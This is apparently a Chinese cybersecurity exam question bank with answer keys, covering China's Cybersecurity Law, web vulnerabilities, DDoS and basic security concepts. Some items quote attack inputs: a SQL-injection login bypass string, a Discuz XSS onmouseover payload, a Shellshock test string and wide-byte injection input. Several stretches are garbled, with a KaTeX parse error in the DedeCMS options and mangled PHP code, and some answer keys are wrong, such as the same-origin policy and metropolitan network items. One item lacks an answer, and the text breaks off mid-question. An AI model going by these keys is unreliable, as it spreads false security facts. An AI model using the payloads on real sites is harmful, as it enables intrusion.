22、以下哪个不是数据的三性原则?()

A、 完整性

B、 再生性

C、 保密性

D、 可用性

您的答案: 标准答案: B

23、在网络安全法立法中,网络运营者不包括以下哪个?()

A、 网络所有者

B、 网络管理者

C、 网络使用者

D、 网络服务提供者

您的答案: 标准答案: C

24、关于个人信息,网络安全法采用的身份识别说,这个方法借鉴的那个国家组织立法?()

A、 欧盟

B、 美国

C、 俄罗斯

D、 联合国

您的答案: 标准答案: A

25、以下那条规定国家在网络安全领域作用与职能?()

A、 十八条

B、 十九条

C、 二十条

D、 二十一条

您的答案: 标准答案: A

26、网络运行安全主要涉及几个层次?()

A、 1

B、 2

C、 3

D、 4

您的答案: 标准答案:

27、网络运行安全的一般性要求由多少条法规规定?()

A、 5

B、 10

C、 15

D、 20

您的答案: 标准答案: C

28、我们在网络运行安全领域所采取的基本制度是网络安全等级保护制度。

A、 是

您的答案: 标准答案: A

29、网络安全保护义务具体有几项?()

A、 5

B、 4

C、 3

D、 2

您的答案: 标准答案: A

30、网络产品服务具有收集用户信息功能的,其提供者不需要向用户明示。

A、 对

B、 错

您的答案: 标准答案: B

31、国家网信部对关键基础设施一系列规定包含几项?()

A、 4

B、 3

C、 2

D、 1

您的答案: 标准答案: A

32、网安法第三十三条反应的是那个层面的安全?()

A、 技术要素

B、 组织管理

C、 在线内容

D、 运行维护

您的答案: 标准答案: A

33、关键基础设施的运营者还应该履行几项重要的安全保护义务?()

A、 3

B、 4

C、 5

D、 6

您的答案: 标准答案: C

34、网安法第多少条规定了具有网络安全监督管理职责的部门对信息进行保密?()

A、 43

B、 44

C、 45

D、 46

您的答案: 标准答案: C

35、任何个人组织发送的电子信息可以包含任意信息。

A、 对

B、 错

您的答案: 标准答案: B

36、以下那十条详细规定了网络运营者在网络保护中应当承担的义务和责任?()

A、 第40-50条

B、 第45-55条

C、 第50-60条

D、 第55-65条

您的答案: 标准答案: A

37、以下哪项不是网络运营收集个人信息的原因?()

A、 合法

B、 正当

C、 必要

D、 盈利

您的答案: 标准答案: D

38、网络安全事件发生风险增大时,()级以上政府需要采取措施?

A、 县级

B、 市级

C、 省级

D、 中央级

您的答案: 标准答案: C

39、网络安全法中没有规定对应违法事件的刑事责任。

A、 对

B、 错

您的答案: 标准答案: B

40、网络安全法中设立的最高返款金额为()万元。

A、 一

B、 十

C、 百

D、 千

您的答案: 标准答案: C

41、网络安全法中规定:人员违法相关单位也可能会追究刑事责任。

A、 是

您的答案: 标准答案: A

42、不是所有的网络犯罪都会追究单位责任。

A、 对

B、 错

您的答案: 标准答案: B

43、非法利用信息网络罪中同时违法该条两款行为时,会受到怎样的惩罚?()

A、 两项从重处罚

B、 两项数罪并罚

C、 两项从轻处罚

D、 两项逐个处罚

您的答案: 标准答案: A

44、以下那组是网络安全法关于技术要素层面的安全规定?()

A、 第64,67,68,70条

B、 第64,69,70,73条

C、 第60,62,65,75条

D、 第59,61,63,75条

您的答案: 标准答案: C

45、民法总则是第()次对于数据与网络虚拟财产的法律属性进行规定。

A、 一

B、 二

C、 三

D、 四

您的答案: 标准答案: A

46、国家网信部门规定的重要规定有()项。

A、 6

B、 7

C、 8

D、 9

您的答案: 标准答案: D

47、最高司法机关的规范文件共有()项

A、 3

B、 4

C、 5

D、 6

您的答案: 标准答案: C

48、根据网信部规定,通讯工具开通公众账号必须满足()的要求。

A、 缴费制

B、 公益制

C、 实名制

D、 守信制

您的答案: 标准答案: C

49、国家对于打击电信诈骗案的引发点是()。

A、 雪梨枪案

B、 北京千万电信诈骗案

C、 8·19徐玉玉电信诈骗案

D、 K8社工库侵犯公民个人信息案

您的答案: 标准答案: C

50、对于贩卖公民通信记录等重要信息入罪门槛是()条

A、 5000

B、 50000

C、 100000

D、 1000000

您的答案: 标准答案: A

1、通过____分析攻击事件能得到更准确的信息。

A、 文件修改时间

B、 IDS告警日志

C、 网站后门

D、 来源ip

您的答案: 标准答案: B

2、下列哪项不是针对内网入侵及告警分析的思路?

A、 基于IP的分析

B、 基于时间的分析

C、 基于告警级别的分析

D、 基于业务的分析

您的答案: 标准答案: D

3、下列哪项不属于DDOS的攻击方式?

A、 通过使网络过载来干扰甚至阻断正常的网络通讯

B、 通过向服务器提交大量请求,使服务器超负荷

C、 用户访问网站新功能

D、 通过向目标机发送ping包,造成网络堵塞或资源耗尽

您的答案: 标准答案: C

4、下列哪项不是JBoss的JAVA反序列化漏洞的防御方案?

A、 在源码中打入官方最新patch

B、 限定可以连接到JBoss的IP

C、 对JBoss专有用户,设置高权限

D、 在jmx-invoker-service.xml中开启权限验证

您的答案: 标准答案: C

5、下列哪项不能有效防御海量DDOS攻击?

A、 利用dns实现均衡,并加强dns自身防护能力

B、 4层负载均衡之前,构建ddos防护系统

C、 在4层与7层之间均实现HTTP Flood防护

D、 在用户请求过多时,限制所有用户请求

您的答案: 标准答案: D

6、下列哪项不是web应用中使用cookie会话机制可能造成的风险?

A、 会话劫持

B、 造成缓冲区溢出

C、 cookie注入

D、 信息泄露

您的答案: 标准答案: B

7、下列哪项不是Redis未授权访问缺陷解决方案?

A、 尽可能不对公网直接开放 SSH 服务

B、 在内网中使用简单的密码,方便测试

C、 对 redis 访问启用密码认证,并且添加 IP 访问限制和修改redis的默认端口6379

D、 禁止使用 root 权限启动 redis 服务

您的答案: 标准答案: B

8、下列哪项不是可移动终端程序可能受到的攻击?

A、 对用户数据请求进行加密

B、 拒绝服务:是合法用户无法获得资源

C、 破坏或修改数据

D、 泄露用户或主机的机密信息

您的答案: 标准答案: A

9、下列对于redis提权的说法错误的是?

A、 redis在root权限下运行,导致了可提权

B、 如果目标机ssh未启用公钥登录,则可能提权失败

C、 提权的过程是将redis公钥保存在redis的配置文件中,然后将配置文件保存在root目录下的.ssh目录,进而使用私钥登录进行root用户

D、 如果设置了redis的访问密码就不会有被提权风险

您的答案: 标准答案: D

10、下列关于TCP三次握手的描述错误的是?

A、 为了提供可靠的数据传输,所以需要三次握手协议

B、 tcp的数据传输是在完成了三次握手协议之后才开始的

C、 在三次握手协议中,服务器会维护一个队列,来维持每个客户端与服务器的三次握手协议的进行

D、 cc攻击就是利用了tcp三次握手协议来发起的一种DDOS攻击

您的答案: 标准答案: D

11、下面关于CC攻击的描述正确的是?

A、 频繁访问需要占用大量系统资源的服务,导致系统资源耗尽从而达到拒绝服务的目的

B、 利用服务应用本身缺陷导致程序崩溃停止服务

C、 利用网络协议本身的运作机制构造一场数据包,导致服务端口阻塞

D、 利用大带宽流量和海量连接数封堵服务端口

您的答案: 标准答案: A

12、下面对于synflood攻击的原理描述正确的是?

A、 频繁访问需要占用大量系统资源的服务,导致系统资源耗尽从而达到拒绝服务的目的

B、 利用服务应用本身缺陷导致程序崩溃停止服务

C、 利用tcp/ip协议的3次握手机制,伪造无效IP,造成服务器长期等待握手响应无法释放资源造成服务器拒绝服务

D、 利用大带宽流量和海量连接数封堵服务端口

您的答案: 标准答案: C

13、下列对于PHP防sql注入的方法描述错误的是?

A、 PHP的PDO技术,通过参数化查询将参数与查询语句分别执行,从根本上杜绝sql注入

B、 当设置magic_quotes_gpc=on的时候,PHP会对用户通过任何方式传来的所有参数进行Addslashes()过滤

C、 Intval()将变量转换成整形变量,对于数字型注入具有很好的防御效果

D、 Addslashes(),对参数进行单引号、双引号、反斜杠以及NULL进行转义

您的答案: 标准答案: B

14、下列对于MD5加密与解密的描述错误的是?

A、 MD5加密是不可逆的

B、 MD5可以用来加密数据,防止信息泄露,需要使用的时候可以解密获取

C、 MD5加密目前只能通过枚举法来破解

D、 MD5使用的是HASH算法,在计算过程中可能有部分信息丢失

您的答案: 标准答案: B

15、下列对于redis未授权访问漏洞的描述正确的是?

A、 redis系统默认弱口令,并且暴漏在公网上

B、 redis存在未授权访问漏洞,需要升级打补丁

C、 redis默认安装没有访问控制,需要修改配置文件启用访问限制并且设置密码

D、 操作系统漏洞,由于系统安全配置不当导致redis未授权访问

您的答案: 标准答案: C

16、白帽子,在没有经过厂商允许的前提下,进入目标主机并下载了大量敏感信息,没有使用敏感数据谋取财富,并且上交到漏洞响应平台,这样的行为是否违法?

A、 违法

B、 不违法

您的答案: 标准答案: A

17、Addslashes()函数不对____字符进行转义。

A、 单引号

B、 双引号

C、 NULL

D、 斜杠

您的答案: 标准答案: D

18、下列不属于MVC架构中视图的作用的是____。

A、 解释模型

B、 发送用户输入给控制器

C、 允许控制器选择视图

D、 选择响应的视图

您的答案: 标准答案: D

19、下列选项关于FTP(File Transfer Protocol)传输方向描述正确的是?

A、 单向传输

B、 双向传输

C、 多方向传输

您的答案: 标准答案: B

20、数据帧往出发送数据时,每帧长度超出____则需要切片。

A、 1000B

B、 1100B

C、 1300B

D、 1500B

您的答案: 标准答案: D

21、synflood(拒绝服务攻击)是基于____协议的。

A、 TCP

B、 UDP

C、 ICMP

D、 IGMP

您的答案: 标准答案: A

22、TCP中RST标志位置1,则表拒绝连接。

A、 正确

B、 错误

您的答案: 标准答案: A

23、下列不属于MVC架构中视图的作用的是?

A、 解释模型

B、 发送用户输入给控制器

C、 允许控制器选择视图

D、 选择响应的视图

您的答案: 标准答案: D

24、CMS通常情况下均基于MVC架构。

A、 正确

B、 错误

您的答案: 标准答案: A

25、下列选项中属于绕过签名验证机制的安卓漏洞是____。

A、 Stagefright漏洞

B、 WebView漏洞

C、 master key漏洞

D、 launchAnyWhere漏洞

您的答案: 标准答案: C

26、下列选项中不能提升密码强度的是____。

A、 不使用弱口令

B、 使用个人身份信息

C、 一定时间段必须更换密码

D、 尽可能增加密码复杂度(大小写字母、数字、特殊字符)

您的答案: 标准答案: B

27、RFID技术窃取银行卡中的信息不包括____。

A、 姓名

B、 身份证号码

C、 银行卡号码

D、 密码

您的答案: 标准答案: D

28、USIM和SIM卡最大的不同是____。

A、 保密信息

B、 IMSI

C、 序列号

D、 内存

您的答案: 标准答案: A

29、威胁情报中情报处理的手段不包括____。

A、 数据挖掘

B、 关联分析、机器学习

C、 情报统一存储

D、 可视化分析、专家分析

您的答案: 标准答案: C

30、云内安全挑战不包括____。

A、 云数据中心内部攻击防御困难

B、 云内性能处理优化

C、 云内部的流量及威胁防护困难

D、 安全的任意扩展、动态部署和迁移·

您的答案: 标准答案: B

31、云数据中的安全策略不包括____。

A、 交换机ACL、可信计算

B、 提高云数据中心的硬件性能

C、 云查杀

D、 云WAF

您的答案: 标准答案: B

32、下列对网络靶场理解不正确的是____。

A、 靶场内有真实个人数据

B、 是一个实验环境

C、 仿真真实网络的各种行为

D、 根据实战进行设计

您的答案: 标准答案: A

33、下列哪个是机器学习的常用算法?

A、 冒泡排序

B、 关联规则学习

C、 RSA算法

D、 DES算法

您的答案: 标准答案: B

34、白帽子开发的黑客工具在网络传播,被不法分子所利用,造成了严重的后果,那工具的开发者需要承担法律责任吗?

A、 不需要承担法律责任

B、 需要承担法律责任

您的答案: 标准答案: B

35、下列哪一项不是CSRF漏洞可能造成的风险?

A、 开启路由器远程管理功能

B、 信息泄露

C、 缓冲区溢出

D、 XSS攻击

您的答案: 标准答案: C

36、什么是拒绝服务攻击

A、 远程或本地正常的服务停止工作

B、 服务器卡机

C、 蓝屏

D、 网络正常使用

您的答案: 标准答案: A

37、那个协议需要验证并双方效验?

A、 ftps

B、 UDP/IP

C、 UDP

D、 TCP

您的答案: 标准答案: D

38、cc攻击使用的哪一个工具

A、 watch

B、 oclHashcat

C、 burp

D、 TCP/IP

您的答案: 标准答案: A

39、ipconfig /displaydns是什么指令

A、 可以看到机器当前DNS缓存列表

B、 可以看到机器当前IP列表

C、 查看跨域地址

D、 查看路由器地址

您的答案: 标准答案: A

40、还原.net代码混淆工具

A、 lLspy

B、 de4dot

C、 Reflector

D、 uedit32

您的答案: 标准答案: B

41、安卓系统最早起源来于?

A、 Linux

B、 JAVA

C、 C+

D、 .net

您的答案: 标准答案: A

42、4.3安卓系统WEbkit漏洞修补方法

A、 禁止访问

B、 删除代码

C、 关闭接口

D、 去掉空白字符

您的答案: 标准答案: D

43、DedeCMS5.7远程文件包含漏洞中存在变量覆盖漏洞的语句是

A、 foreach($$_trwurdy sd $_k => $_v) k = R u n M a g i c Q u o t e s ( _k = RunMagicQuotes( k=RunMagicQuotes(_v);

B、 foreach($$_trwurdy sd $_k => $_v) ( ( (_k) = RunMagicQuotes($_v);

C、 foreach($$_trwurdy sd $_k => $_v) [ [ [_k] = RunMagicQuotes($_v);

D、 foreach($$_trwurdy sd $_k => $_v) KaTeX parse error: Expected '}', got 'EOF' at end of input: {_k} = RunMagicQuotes($_v);

您的答案: 标准答案: D

44、文件包含分为本地文件包含和远程文件包含

A、 对

B、 错

您的答案: 标准答案: A

45、Discuz使用了以下哪种标记语言??()

A、 Muse

B、 AsciiDoc

C、 BBCode

D、 Textile

您的答案: 标准答案: C

46、以下选项中,Discuz存储型DOM XSS攻击使用的payload正确的是?()

A、 [align=οnmοuseοver="alert(1)]

B、 [align="οnmοuseοver="alert(1)]

C、 [align="οnmοuseοver=alert(1)]

D、 [align="οnmοuseοver=“alert(1)”]

您的答案: 标准答案: B

47、通过告警日志分析攻击事件的基本技能不包括以下哪个选项?()

A、 网络协议基础知识

B、 网站架构基础知识

C、 程序代码编写能力

D、 网站常见攻击手段

您的答案: 标准答案: C

48、御剑在进行后台探测时发送的HTTP请求方式是?()

A、 POST

B、 HEAD

C、 GET

D、 OPTIONS

您的答案: 标准答案: B

49、告警信息原始报文中可以看到的信息不包括以下哪个选项?()

A、 攻击者发送的HTTP请求

B、 服务器返回的响应信息

C、 服务器的网络拓扑结构

D、 攻击者使用的IP地址

您的答案: 标准答案: C

50、MYSQL远程登录成功会生成安全审计类告警信息。()

A、 对

B、 错

您的答案: 标准答案: A

1、Web程序中出现以下哪种情况能形成漏洞?()

A、 可控变量进入正常函数

B、 可控变量进入危险函数

C、 不可控变量进入正常函数

D、 不可控变量进入危险函数

您的答案: 标准答案: B

2、以下哪个选项是SQL注入payload中#的作用?()

A、 闭合前面sql语句

B、 闭合后面sql语句

C、 注释前面sql语句

D、 注释后面sql语句

您的答案: 标准答案: D

3、以下哪个选项是PHPCMS中存在SQL注入漏洞的字段?()

A、 Accept

B、 Referer

C、 User-Agent

D、 X-Forwarded-For

您的答案: 标准答案: B

4、在PHPCMS SQL注入漏洞中构造的payload是使用的以下哪种方法?()

A、 insert插入

B、 select查询

C、 group by报错

D、 update更新

您的答案: 标准答案: C

5、insert into语句一次不可以向数据库插入多条数据。

A、 对

B、 错

您的答案: 标准答案: B

6、SQL注入漏洞获取的HTTP_X_FORWARDED_FOR字段对应HTTP请求头中的哪个字段?()

A、 Forwarded

B、 Forwarded_For

C、 X_Forwarded

D、 X_Forwarded_For

您的答案: 标准答案: D

7、在BlueCMS1.6 SQL注入漏洞中构造的payload是使用的以下哪种方法?()

A、 闭合update语句,将敏感数据读取到页面中

B、 构造delete语句,将敏感数据读取到页面中

C、 闭合insert语句,将敏感数据插入到评论表

D、 构造union语句,将敏感数据插入到评论表

您的答案: 标准答案: C

8、XML注入漏洞字段HTTP_RAW_POST_DATA在以下哪种情况下会生成?()

A、 POST发送可识别的MIME类型数据

B、 POST发送不可识别的MIME类型数据

C、 客户端发送GET请求

D、 客户端发送HEAD请求

您的答案: 标准答案: B

9、在xml中,CDATA区段的文本会被xml解析器忽略。

A、 对

B、 错

您的答案: 标准答案: A

10、PHPYun XML注入漏洞构造payload时使用的是哪个SQL关键词?()

A、 update

B、 insert

C、 union

D、 delete

您的答案: 标准答案: C

11、需要如何修改HTTP请求才能触发XML注入漏洞?()

A、 Content-Type:text/html;

B、 Content-Type:application/x-www-form-urlencoded;

C、 Content-Type:text/plain;

D、 Content-Type:text/xml;

您的答案: 标准答案: D

12、在Bash中哪个命令可以将局部变量变成全局变量?()

A、 exec

B、 expand

C、 export

D、 expr

您的答案: 标准答案: C

13、存在远程命令执行漏洞的Bash中输入export v=’() { echo “X”;}; echo “Y”’;bash会输出X。

A、 对

B、 错

您的答案: 标准答案: B

14、以下选项中哪个PHP的函数可以执行系统命令?()

A、 var_dump

B、 request

C、 system

D、 extract

您的答案: 标准答案: C

15、以下哪个PHP函数可以将数据写入文件?()

A、 readfile

B、 fopen

C、 file_put_contents

D、 file_get_contents

您的答案: 标准答案: C

16、PHP中的extract函数的作用是从数组中将变量导入到当前的符号表。

A、 对

B、 错

您的答案: 标准答案: A

17、PHP执行eval(phpinfo())时,会返回什么信息?()

A、 服务器网络配置信息

B、 服务器php配置信息

C、 服务器系统配置信息

D、 服务器硬件配置信息

您的答案: 标准答案: B

18、以下选项中哪种情况可以导致PHP代码执行漏洞?()

A、 用户通过浏览器提交执行命令,客户端没有针对执行函数做过滤

B、 用户通过浏览器提交执行命令,客户端针对执行函数做过滤

C、 用户通过浏览器提交执行命令,服务器端针对执行函数做过滤

D、 用户通过浏览器提交执行命令,服务器端没有针对执行函数做过滤

您的答案: 标准答案: D

19、PHP代码执行漏洞可以调用system函数执行系统命令。

A、 对

B、 错

您的答案: 标准答案: A

20、PHP脚本<?php echo preg_replace('/\{\?([^}]+)\}/e',"$1","{?md5(123)}"); ?>会输出什么内容?()

A、 ?md5(123)

B、 {?md5(123)}

C、 202cb962ac59075b964b07152d234b70

D、 {?md5(123)}

您的答案: 标准答案: C

21、Web目录下的upload/test.zip文件通过以下哪种链接可以下载?()

A、 upload/…/test.zip

B、 upload/…/./test.zip

C、 config/…/upload/test.zip

D、 config/././upload/test.zip

您的答案: 标准答案: C

22、Windows平台下的Web目录下的test.php不能通过test.PhP访问。

A、 对

B、 错

您的答案: 标准答案: B

23、PHP执行函数strrpos(“I_love_php.php”,".php")会返回什么值?()

A、 7

B、 8

C、 9

D、 10

您的答案: 标准答案: D

24、PHP执行函数strtolower(“PHP”)会返回什么值?()

A、 php

B、 Php

C、 PHp

D、 PHP

您的答案: 标准答案: A

25、PHP执行 t e = ( 1 + 2 ) ? 4 : 6 ; 之 后 , te=(1+2)?4:6;之后, te=(1+2)?4:6;,te的值是什么?()

A、 1

B、 2

C、 4

D、 6

您的答案: 标准答案: C

26、以下选项中对"multipart/form-data"的解释不正确的是?()

A、 基础方法是post请求

B、 基础方法是get请求

C、 http协议本身的原始方法不支持multipart/form-data

D、 可用于文件上传时,设置表单的MIME类型

您的答案: 标准答案: B

27、以下哪个选项的内容可以替代SQL语句中的空格?()

A、 /**/

B、 #

C、 –

D、 //

您的答案: 标准答案: A

28、PHP的addslashes函数的作用是什么?()

A、 去除字符串中的预定义字符

B、 将字符串中的预定义字符之前添加反斜杠

C、 将字符串按照预定义字符进行分割

D、 将字符串中的预定义字符替换为空格

您的答案: 标准答案: B

29、mysql数据库使用utf-8字符集可能导致宽字节注入。

A、 对

B、 错

您的答案: 标准答案: B

30、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()

A、 使用PHP的trim函数,字符集使用utf-8

B、 使用PHP的trim函数,字符集使用gbk

C、 使用PHP的addslashes函数,字符集使用utf-8

D、 使用PHP的addslashes函数,字符集使用gbk

您的答案: 标准答案: D

31、以下哪种方式可以防止宽字节注入?()

A、 mysql_query(“set names gbk”)和addslashes()函数结合使用

B、 使用mysql_query(“set names gbk”)设置字符集

C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用

D、 使用mysql_set_charset(“gbk”)设置字符集

您的答案: 标准答案: C

32、以下哪个选项对asp运算符的解释错误?()

A、 <>为不等于

B、 IS判断两个字符串是否相等

C、 XOR为"异或"运算

D、 OR为"或"运算

您的答案: 标准答案: B

33、SQL语句"select * from user where name=’". n a m e . &quot; ′ a n d p a s s = ′ &quot; . name.&quot;&#x27; and pass=&#x27;&quot;. name."andpass=".pass."’"如何绕过登录?()

A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456

B、 $name设置值为admin’ and ‘1’='1 $pass的值为123456

C、 $name设置值为admin’ or ‘1’='1 $pass的值为123456

D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456

您的答案: 标准答案: C

34、以下选项中哪些措施不能防御CSRF攻击?()

A、 使用一次性Token验证

B、 在HTTP头中自定义属性并验证

C、 全部操作使用POST传递数值

D、 使用复杂度高的验证码

您的答案: 标准答案: C

35、以下哪个函数是作为FLASH与宿主界面JavaScript通信的接口?()

A、 External.call

B、 ExternalConfig.call

C、 ExternalInterface.call

D、 Externalrunning.call

您的答案: 标准答案: C

36、以下哪个选项的内容是JavaScript中的注释符?()

A、 ~

B、 //

C、 *

D、 #!

您的答案: 标准答案: B

37、以下哪个选项对于反射型XSS的描述是错误的?()

A、 可以结合CSRF来利用

B、 攻击代码存储在客户端

C、 攻击代码存储在服务端

D、 可以劫持用户访问链接

您的答案: 标准答案: C

38、以下哪个选项可以成功的设置Web应用浏览器端的Cookie值?()

A、 在浏览器Console中输入document.cookie=“test=123456”

B、 在浏览器Console中输入document.cookie(“test=123456”)

C、 在浏览器地址栏中输入document.cookie=“test=123456”

D、 在浏览器地址栏中输入document.cookie(“test=123456”)

您的答案: 标准答案: A

39、技术流的完整提供测试不包含下面那一项?

A、 勘察探索

B、 监测捕获

C、 错误定位

D、 错误修复

您的答案: 标准答案: D

40、以下哪个选项不属于安全测试的流程?

A、 信息汇总

B、 交互测试

C、 审核验证

D、 项目交接

您的答案: 标准答案: D

41、软件开发安全生产解决方法不包含哪一项?

A、 溯源检测

B、 合规检测

C、 安全检测

D、 应急响应

您的答案: 标准答案: D

42、安全检测需要嵌入到软件开发流程中。

A、 对

B、 错

您的答案: 标准答案: A

43、HTTPS的设计是可以避免下列哪种攻击?

A、 SQL注入攻击

B、 跨站脚本攻击

C、 中间人攻击

D、 暴力破解攻击

您的答案: 标准答案: C

44、同源策略不包含下面那一项?

A、 协议

B、 路径

C、 端口号

D、 域名

您的答案: 标准答案: A

45、哪些设置可以有效的避免cookie的完整性所带来的安全问题?

A、 Shared domain providers

B、 Website development/deployment

C、 Exploration of Cookie Policy Change

D、 HTTPS instead of HTTP

您的答案: 标准答案: D

46、App-web接口检测系统架构的组成包含哪些?

A、 Triggering

B、 Detection

C、 Provenance

D、 Counterattack

您的答案: 标准答案: D

47、App-web接口检测系统使用哪种方法识别APP上的广告?

A、 特征码

B、 接口扫描

C、 机器学习

D、 分类标识

您的答案: 标准答案: A

48、下面哪一项不属于浏览器的防护手段?

A、 沙盒

B、 隔离堆

C、 Httponly

D、 栈cookies

您的答案: 标准答案: C

49、Redis未授权漏洞的根本原因是运维人员安全意识薄弱

A、 对

B、 错

您的答案: 标准答案: A

50、如果服务端IP为192.168.1.1,下列哪项是使用命令手动连接Redis的正确方式?

A、 redis-cli 192.168.1.1

B、 Redis -cli 192.168.1.1

C、 redis cli 192.168.1.1

您的答案: 标准答案: A

1、防间谍软件要求下列选项中除( )以外的所有特性。

A、 定期更新以防止最新间谍软件攻击

B、 能提供连续性监控并能够完全扫描整个计算机

C、 能够显示威胁处理推荐动作的详细信息

D、 只有商业软件可用,需要按年付费

您的答案: 标准答案: D

2、 在TCP/IP参考模型中,应用层是最高的一层,它包括了所有的高层协议。下列协议中不属于应用层协议的是( )

A、 HTTP

B、 FTP

C、 UDP

D、 SMTP

您的答案: 标准答案: C

3、下列方法中,识别Email来源真实性最可靠的是( )。

A、 查看发件服务器地址

B、 查看发件人名称

C、 查看发件人地址

D、 查看回信地址

您的答案: 标准答案: A

4、下列选项中,除了( )以外都是杀毒软件发现病毒时的可选项。

A、 清除文件中的病毒

B、 隔离被感染文件

C、 发送邮件告诉攻击者病毒已暴露

D、 删除包含病毒的文件

您的答案: 标准答案: C

5、( )是一个预先定义的电子邮件地址列表,用户可以接收来自该列表中地址的邮件。

A、 僵尸网络

B、 黑名单blacklist

C、 白名单whitelist

D、 干净列表

您的答案: 标准答案: C

6、密码学包括密码编码学和密码解码学。( )

A、 对

B、 错

您的答案: 标准答案: B

7、可以通过配置( )来防止用户通过多次登录尝试来猜测其他人的密码

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

您的答案: 标准答案: B

8、Ping命令使用ICMP的哪一种Code类型( )。

A、 Redirect

B、 Echo reply

C、 Source quench

D、 Destination Unreachable

您的答案: 标准答案: B

9、在Linux系统中,修改口令策略和查看某个用户的口令策略分别是对如下哪两个文件进行操作( )。

A、 /etc/login.defs和/etc/shadow

B、 /etc/login.defs和/etc/passwd

C、 /etc/passwd和/etc/shadow

D、 /etc/shadow和/etc/login

您的答案: 标准答案: A

10、在信息系统安全中,风险由( )两种因素共同构成的。

A、 攻击和脆弱性

B、 威胁和攻击

C、 威胁和脆弱性

D、 威胁和破坏

您的答案: 标准答案: C

11、Windows系统中权限最高为( )。

A、 administrators

B、 power users

C、 guests

D、 system

您的答案: 标准答案: D

12、Windows紧急修复盘不能修复下列哪个项目( )。

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

您的答案: 标准答案: A

13、Windows系统中“net share”命令的作用是( )。

A、 查看本机的共享资源

B、 创建本机的共享资源

C、 删除本机的共享资源

D、 查看局域网内其他主机的共享资源

您的答案: 标准答案: A

14、 Windows平台的可执行文件格式是( )。

A、 TXT

B、 PE

C、 ELF

D、 PPT

您的答案: 标准答案: B

15、网络安全中的CIA三元组指的是( )。

A、 机密性,完整性,可用性

B、 真实性,完整性,可控性

C、 机密性,真实性,可用性

D、 完整性,可用性,可控性

您的答案: 标准答案: A

16、信息安全的目标之一是确保数据对授权用户是可访问的,也称作( )目标。

A、 可用性

B、 完整性

C、 机密性

D、 机密性、完整性、和可用性

您的答案: 标准答案: A

17、以通过发现漏洞来提升安全性为目标的黑客,被称作( )。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

您的答案: 标准答案: B

18、在网络攻击的典型步骤中,攻击者在探查计算机或网络信息后,下一步将( )。

A、 修改网络安全配置

B、 穿透网络安全防护

C、 瘫痪网络和设备

D、 迂回到其他系统

您的答案: 标准答案: B

19、从不同厂家购买安全产品,希望一家产品的安全失效不会影响整个系统的安全性,这是利用( )来提升安全性。

A、 模糊性

B、 纵深防御

C、 限制性

D、 多样性

您的答案: 标准答案: D

20、( )是一个计算机程序或一个程序的一部分,它平时保持休眠直到被特定的逻辑事件触发。

A、 逻辑炸弹

B、 触发器

C、 蠕虫

D、 病毒

您的答案: 标准答案: A

21、当成百上千计算机被远程控制时就形成了( )。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

您的答案: 标准答案: A

22、( )被用于将文本、图像、音频和视频合并到一个单一文档中。

A、 TCP/IP

B、 HTML

C、 HTTP

D、 HSL

您的答案: 标准答案: B

23、现代计算机的基本输入输出系统(BIOS)存储在( )芯片上。

A、 银闪存

B、 基本输出/输入

C、 可编程只读存储器

D、 只读存储器

您的答案: 标准答案: C

24、RAID1 是一种( )的磁盘镜像技术。

A、 从磁盘读取数据两次

B、 数据写到多磁盘

C、 刷BIOS

D、 降低可靠性

您的答案: 标准答案: B

25、Cookie( )。

A、 可以包含病毒

B、 行为类似蠕虫

C、 可能带来隐私风险

D、 是在Web服务器计算机上放置的小文件

您的答案: 标准答案: C

26、关于键盘记录器,下列选项中除( )以外都是正确的。

A、 它可能是插在键盘连接器和计算机键盘端口之间的一个小设备

B、 它只搜集在网站上输入的信息

C、 击键记录被其搜集并存储为文档

D、 软件键盘记录器通常作为木马被下载和安装

您的答案: 标准答案: B

27、对社交网站上分享的内容应考虑设置“只有我的朋友”查看,这是因为_( )。

A、 社交网络上的朋友不可信

B、 社交网络对于谁能加入网络查看信息没有控制

C、 社交网络要求该选项

D、 攻击者不会假装成朋友

您的答案: 标准答案: B

28、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示( )。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

您的答案: 标准答案: B

29、程序和数据能够存储于其上的集中式网络计算机,称作( )。

A、 服务器

B、 客户端

C、 Web代理

D、 网络设备认证

您的答案: 标准答案: A

30、IP地址的一个例子是( )。

A、 $800922$9988

B、 14102009

C、 00:15:59:3B:30:C3

D、 192.168.11.100

您的答案: 标准答案: D

31、城域网又称为( )。

A、 WAN

B、 LAN

C、 PAN

D、 WPAN

您的答案: 标准答案: A

32、用户为了( )可以允许网络上的其他用户查看目录内容。

A、 文本传递

B、 网络认证

C、 目录分发

D、 文件共享

您的答案: 标准答案: D

33、对WiFi信号进行沿街扫描,不需要使用( )。

A、 USB无线网卡

B、 全方向天线

C、 移动计算机设备

D、 音频喇叭

您的答案: 标准答案: D

34、计算机网络按威胁对象大体可分为两种:一是对网络中信息的威胁; 二是( )

A、 人为破坏

B、 对网络中设备的威胁

C、 病毒威胁

D、 对网络人员的威胁

您的答案: 标准答案: B

35、在网络寻址过程中,将目标设备IP翻译为MAC地址的协议是( )

A、 ICMP

B、 DNS

C、 SNMP

D、 ARP

您的答案: 标准答案: D

36、信息安全管理最关注的是( )

A、 外部恶意攻击

B、 病毒对PC的影响

C、 内部恶意攻击

D、 病毒对网络的影响

您的答案: 标准答案: C

37、在需要保护的信息资产中( )是最重要的

A、 环境

B、 硬件

C、 数据

D、 软件

您的答案: 标准答案: C

38、美国国防部在他们公布的可信计算机系统评价标准中,将计算机系统的安全级别分为四类七个安全级别,其中描述不正确的是( )

A、 A类的安全级别比B类高

B、 C1类的安全级别比C2类要高

C、 随着安全级别的提高,系统的可恢复性就越高

D、 随着安全级别的提高,系统的可信度就越高

您的答案: 标准答案: B

39、甲通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用( )。

A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

您的答案: 标准答案: D

40、甲通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用( )

